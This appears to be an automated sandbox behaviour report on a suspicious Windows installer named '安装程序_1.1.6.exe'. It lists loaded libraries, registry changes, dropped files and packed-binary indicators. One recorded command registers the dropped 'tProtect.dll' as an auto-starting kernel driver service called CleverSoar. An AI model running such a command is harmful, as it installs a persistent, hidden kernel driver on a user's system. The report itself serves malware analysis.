Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Static file information: File size 9897435 > 1048576
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1852873352.0000000000E40000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1852683211.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_007557D0
Source: update.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Static PE information: real checksum: 0x0 should be: 0x97533d
Source: update.vbc.1.dr | Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x343a62
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343a62
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr | Static PE information: section name: .didata
Source: update.vbc.1.dr | Static PE information: section name: .00cfg
Source: update.vbc.1.dr | Static PE information: section name: .voltbl
Source: update.vbc.1.dr | Static PE information: section name: .aQ#
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: update.vbc.6.dr | Static PE information: section name: .00cfg
Source: update.vbc.6.dr | Static PE information: section name: .voltbl
Source: update.vbc.6.dr | Static PE information: section name: .aQ#
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC3BDDB push ecx; ret 6_2_6CC3BDEE
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAE0F00 push ss; retn 0001h 6_2_6CAE0F0A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CD09F10 push eax; ret 6_2_6CD09F2E
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC6E9F4 push 004AC35Ch; ret 6_2_6CC6EA0E
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CD0A290 push eax; ret 6_2_6CD0A2BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006D45F4 push 0077C35Ch; ret 10_2_006D460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076FB10 push eax; ret 10_2_0076FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076FE90 push eax; ret 10_2_0076FEBE
Source: update.vbc.1.dr | Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.dr | Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.dr | Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | File created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbc
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | File created: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
